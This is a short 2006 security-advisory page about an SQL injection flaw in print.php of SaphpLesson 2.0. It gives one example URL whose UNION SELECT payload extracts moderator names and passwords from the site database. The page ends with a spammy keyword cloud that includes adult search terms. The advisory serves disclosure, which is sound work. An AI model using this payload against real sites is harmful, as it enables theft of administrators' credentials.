about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SaphpLesson Print.PHP SQL Injection Vulnerability


Title SaphpLesson Print.PHP SQL Injection Vulnerability
Published 2006-03-27-12:00AM
Updated 2006-03-27-10:14PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Linux_Drox is credited with the discovery of this vulnerability.
Vulnerable  Arabless.com SaphpLesson 2.0
Not Vulnerable  
Code  

This issue can be exploited through a web client.

An example URI has been provided:

http://www.example.com/lesson/print.php?lessid=-1%20union20select20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 10:49:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
card.y6608 www.zgmslm pornosex WWW.R3SHAT wwx arab s phfito/phf Tagger LE. guest+book www.shnkyy Tagger LE. AISWARYRAY hindistory www.go9188 www.sexi.g www.go9144 Tagger LE. /data/vuln Tagger LE. PHPKIT www.xxl.cx download t cnjunshi.b PHPKIT tamil sex spider man gaoyyq.cn gaoyyq.cn vidio mesu www.dnjxw. guest+book news for c gaoyyq.cn Launcher www.sex.tv WWW.Pink w filmale gaoyyq.cn invisison invision p zhqu.com www.80845. www.jphmob 200 /compo www.doudou mark hoppu tee news for c Microsoft 50 sent filmale